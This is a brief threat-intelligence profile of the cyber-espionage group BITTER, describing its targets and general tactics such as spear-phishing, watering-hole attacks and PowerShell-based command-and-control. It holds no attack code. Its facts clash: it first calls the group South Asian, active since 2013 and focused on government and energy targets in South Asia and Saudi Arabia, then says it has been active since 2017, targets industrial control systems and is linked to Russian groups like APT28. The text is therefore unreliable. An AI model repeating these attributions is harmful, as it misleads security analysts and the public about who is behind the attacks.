BITTER

Bitter is a known alias of the APT group APT47

BITTER is a suspected South Asian cyber espionage threat group that has been active since at least 2013. BITTER has targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.

BITTER is an advanced persistent threat (APT) that targets industrial control systems and critical infrastructure, such as power plants, water treatment facilities, and transportation networks. It has been active since at least 2017 and uses a variety of techniques to evade detection by security software, including stealthy malware delivery methods, sophisticated encryption algorithms, and the use of legitimate tools like PowerShell for command-and-control (C&C) communication. BITTER is believed to be associated with Russian state-sponsored hacking groups, such as APT28/Fancy Bear or Sofacy Group.\\
\\
Techniques, tactics and practices: \\
\\
BITTER uses a variety of techniques to evade detection by security software, including stealthy malware delivery methods such as spear-phishing emails or watering hole attacks that target specific websites frequented by the intended victim. It also employs sophisticated encryption algorithms and the use of legitimate tools like PowerShell for command-and-control (C&C) communication, making it difficult to detect by traditional security measures. Additionally, BITTER is known to have a high degree of persistence in its attacks, often remaining undetected within an organization\\\'s network for extended periods of time before carrying out its intended actions.